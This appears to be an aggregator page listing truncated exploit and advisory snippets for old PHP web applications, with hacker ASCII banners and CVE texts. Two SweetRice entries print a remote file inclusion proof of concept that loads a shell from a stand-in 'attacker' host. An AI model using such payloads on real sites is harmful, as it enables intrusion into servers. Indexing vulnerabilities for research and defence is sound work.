The Uploader 2.0 Remote File Upload Vulnerability

Exploit for unknown platform in category web applications ================================================= The Uploader 2.0 Remote File Upload Vulnerability =================================================...

Mini File Host 1.5 - Arbitrary File Upload

Mini File Host 1.5 - Arbitrary File Upload ===================================================================== ========= / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ || || =====================================================================...

PHPhotoalbum Remote File Upload Vulnerability

No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...

Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability

No description provided by source. Exploit Title: Simplicity oF Upload 1.3.2 Remote File Upload Vulnerability Date: 20-12-2009 Author: Master Mind Software Link: http://www.phpsimplicity.com/scripts.php?id=3 Version: 1.3.2 CVE : N/A Tested on: Windows 2003 Server...

Alqatari group 1.0 5.0 - id SQL Injection

Alqatari group 1.0 5.0 - id SQL Injection 1337h4x0rZ //Rd / / / \ \ ============================================================================== ª Note : Hacker R0x Lamerz Sux ! ============================================================================== ª Alqatari group Version 1.0 == 5.0 id...

OpenX <= 2.8.1 execute arbitrary PHP code-exploits warning-the black bar safety net

Test method: OpenX adserver version 2.8.1 and lower is vulnerable to remote code execution. To be exploited, this vulnerability requires banner / file upload permissions, such as granted to the 'advertiser' and 'administrator' roles. This vulnerability is caused by the insecure file upload...

WordPress Installations Under Brute-Force Attack

There is an ongoing attack against some WordPress implementations that is trying to brute-force the passwords for the administrator accounts on the installations. The attack is being driven by an automated PHP script that tries thousands of possible passwords. The SANS Internet Storm Center has...

GLSA-200911-06 : PEAR Net_Traceroute: Command injection

The remote host is affected by the vulnerability described in GLSA-200911-06 PEAR NetTraceroute: Command injection Pasquale Imperato reported that the $host parameter to the traceroute function in Traceroute.php is not properly sanitized before being passed to exec. Impact : A remote attacker cou...

SweetRice <= 0.5.3 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================== SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 0day.today 2018-03-28...

SweetRice 0.5.3 - Remote File Inclusion

SweetRice 0.5.3 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...

Radio istek scripti 2.5 - Remote Configuration Disclosure

turkish radio php script ====================================================== RADIO istek scripti tr Version 2.5 tr Remote config Vulnerability Found by? :? kurdish hackers team C0ntact : pshela at YaHoo .com Groups : Kurd-Team site : www.kurdteam.org...

Radio istek scripti 2.5 - Remote Configuration Disclosure

Radio istek scripti 2.5 - Remote Configuration Disclosure turkish radio php script ====================================================== RADIO istek scripti tr Version 2.5 tr Remote config Vulnerability Found by? :? kurdish hackers team C0ntact : pshela at YaHoo .com Groups : Kurd-Team site :...

CVE-2009-3060

Multiple cross-site scripting XSS vulnerabilities in Joker Board aka JBoard 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the notice parameter to editform.php, 2 the editusermessage parameter to core/editusermessage.php, or 3 the usertitle parameter to...

CVE-2009-3060

Multiple cross-site scripting XSS vulnerabilities in Joker Board aka JBoard 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the notice parameter to editform.php, 2 the editusermessage parameter to core/editusermessage.php, or 3 the usertitle parameter to...

Foreigners: how to get the remote computer's IP address-vulnerability warning-the black bar safety net

Most might think the first time how to find your friend's computer's IP address or find people with you in Yahoo Messenger or chat IP address. In this I will show you how to find remote computer's IP address in one simple step. I created a PHP script that allows you to more easily find you choose...

Code injection

Static code injection vulnerability in Sanus|artificium aka Sanusart Free simple guestbook PHP script, when downloaded before 20081111, allows remote attackers to inject arbitrary PHP code into messages.txt via the message parameter to act.php, which is executed when guestbook/guestbook.php is...

CVE-2008-6934

Static code injection vulnerability in Sanus|artificium aka Sanusart Free simple guestbook PHP script, when downloaded before 20081111, allows remote attackers to inject arbitrary PHP code into messages.txt via the message parameter to act.php, which is executed when guestbook/guestbook.php is...

PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities

Exploit for unknown platform in category web applications =================================================================== PHP Script Forum Hoster Topic Delete/XSS Multiple Vulnerabilities =================================================================== "Word is born Fight the war fuck the...

PHP Script Forum Hoster Deletion / XSS

\ \ \ / / /\ \ / /| \ / \ | \ \ //\ \ / / / / ruling the web since 9/2008 "Word is born Fight the war fuck the norm!" = "PHP Script Forum Hoster" Multiple vulnerabilities Vendor : http://www.shop-020.de Download : http://www.shop-020.de/phpscriptat-p12h4s5-PHP-Forum-Hoster-Por.html Author :...

PHP Script Forum Hoster - Topic Delete Cross-Site Scripting

PHP Script Forum Hoster - Topic Delete Cross-Site Scripting \ \ \ / / /\ \ / /| \ / \ | \ \ //\ \ / / / / ruling the web since 9/2008 "Word is born Fight the war fuck the norm!" = "PHP Script Forum Hoster" Multiple vulnerabilities Vendor : http://www.shop-020.de Download :...